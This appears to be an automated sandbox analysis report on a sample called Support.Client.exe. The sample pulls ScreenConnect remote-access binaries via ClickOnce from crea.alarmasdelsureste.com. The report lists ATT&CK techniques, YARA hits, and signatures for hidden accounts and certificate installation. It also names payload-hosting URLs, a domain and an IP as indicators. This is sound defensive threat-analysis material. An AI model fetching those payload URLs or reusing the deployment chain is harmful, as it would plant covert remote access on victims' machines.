                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..tion_25b0fbb6ef7eb094_0018.0002_dfa92e60aa8309cf\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\Desktop\Support.Client.exeCode function: 0_2_00C01806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00C01806
                  Source: C:\Users\user\Desktop\Support.Client.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\Support.Client.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.a30000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.2124711251.0000000000A32000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2525404173.00000251406A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2135937329.0000000002E8F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7604, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 2944, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Command and Scripting Interpreter
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory1
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job
                  2
                  Windows Service
                  2
                  Windows Service
                  1
                  Install Root Certificate
                  Security Account Manager34
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Scheduled Task/Job
                  12
                  Process Injection
                  1
                  Timestomp
                  NTDS51
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit
                  1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking
                  Cached Domain Credentials51
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579450 Sample: Support.Client.exe Startdate: 22/12/2024 Architecture: WINDOWS Score: 57 46 fp2e7a.wpc.phicdn.net 2->46 48 fp2e7a.wpc.2be4.phicdn.net 2->48 50 3 other IPs or domains 2->50 58 Multi AV Scanner detection for submitted file 2->58 60 .NET source code references suspicious native API functions 2->60 62 Detected potential unwanted application 2->62 64 2 other signatures 2->64 9 Support.Client.exe 2 2->9         started        11 ScreenConnect.ClientService.exe 2->11         started        14 svchost.exe 8 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 19 dfsvc.exe 130 108 9->19         started        23 WerFault.exe 21 16 9->23         started        68 Reads the Security eventlog 11->68 70 Reads the System eventlog 11->70 25 ScreenConnect.WindowsClient.exe 11->25         started        28 WerFault.exe 2 14->28         started        44 127.0.0.1 unknown unknown 16->44 signatures6 process7 dnsIp8 52 crea.alarmasdelsureste.com 104.168.134.232, 443, 49731, 49737 HOSTWINDSUS United States 19->52 36 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 19->36 dropped 38 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 19->38 dropped 40 ScreenConnect.WindowsBackstageShell.exe, PE32 19->40 dropped 42 13 other files (none is malicious) 19->42 dropped 30 ScreenConnect.WindowsClient.exe 19 9 19->30         started        66 Contains functionality to hide user accounts 25->66 file9 signatures10 process11 signatures12 72 Contains functionality to hide user accounts 30->72 33 ScreenConnect.ClientService.exe 30->33         started        process13 signatures14 54 Contains functionality to hide user accounts 33->54 56 Enables network access during safeboot for specific services 33->56

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  Support.Client.exe21%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\467JXDCM.KDT\OTWE8PPY.T3G\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\T4CMJK9K.K3C\OOPO66OZ.RYH\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  199.232.214.172
                  truefalse
                    high
                    0bd0.adrsxpjm0rga0n.de
                    104.168.134.232
                    truefalse
                      unknown
                      crea.alarmasdelsureste.com
                      104.168.134.232
                      truefalse
                        unknown
                        fp2e7a.wpc.phicdn.net
                        192.229.221.95
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.dllfalse
                            unknown
                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Core.dllfalse
                              unknown
                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.dllfalse
                                unknown
                                https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.manifestfalse
                                  unknown
                                  https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                                    unknown
                                    https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                      unknown
                                      https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exefalse
                                        unknown
                                        https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                                          unknown
                                          https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windows.dllfalse
                                            unknown
                                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientService.exefalse
                                              unknown
                                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                                unknown
                                                https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsClient.exefalse
                                                  unknown
                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.fontbureau.com/designersGdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/?dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/bThedfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers?dfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exeDdfsvc.exe, 00000001.00000002.2542470571.000002515BEF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientSer8dfsvc.exe, 00000001.00000002.2525404173.0000025140A4D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2525404173.0000025140919000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://www.tiro.comdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://g.live.com/odclientsettings/ProdV2.C:edb.log.5.drfalse
                                                                  high
                                                                  https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2dfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.fontbureau.com/designersdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsBackstageSxdfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.goodfont.co.krdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://crea.alarmasdelsureste.com/Bin/ScreenConnect.ClientSupport.Client.exe, 00000000.00000002.2002795893.000000000096B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=0bd0.adrOX50X7XC.log.1.drfalse
                                                                              unknown
                                                                              https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application2jdfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationxmdfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://www.sajatypeworks.comdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windodfsvc.exe, 00000001.00000002.2525404173.0000025140AB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.typography.netDdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exe.configTdfsvc.exe, 00000001.00000002.2538222020.000002515A5E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://g.live.com/odclientsettings/Prod.C:edb.log.5.drfalse
                                                                                            high
                                                                                            http://www.founder.com.cn/cn/cThedfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.galapagosdesign.com/staff/dennis.htmdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://g.live.com/odclientsettings/ProdV2edb.log.5.drfalse
                                                                                                  high
                                                                                                  http://www.xrml.org/schema/2001/11/xrml2coreSdfsvc.exe, 00000001.00000002.2525404173.000002514044D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.application%dfsvc.exe, 00000001.00000002.2543292743.000002515BFB4000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.manifestCdfsvc.exe, 00000001.00000002.2524797376.000002514022D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://www.galapagosdesign.com/DPleasedfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://crea.alarmasdelsuScreenConnect.WindowsClient.exe, 00000009.00000002.2135090486.0000000000FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Windows.dllPtdfsvc.exe, 00000001.00000002.2538858090.000002515A67B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              http://www.w3.odfsvc.exe, 00000001.00000002.2525404173.000002514077B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://crea.alarmasdelsureste.com/Bin/ScreenConnect.Client.applicationScreenConnect.WindowsClient.exe, 00000009.00000002.2136661516.000000001B830000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://www.fonts.comdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.sandoll.co.krdfsvc.exe, 00000001.00000002.2535347958.000002515A0C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileManager.exdfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://crea.alarmasdelsureste.com/Bin/ScreenConnect.WindowsFileMadfsvc.exe, 00000001.00000002.2525404173.0000025140994000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          unknown
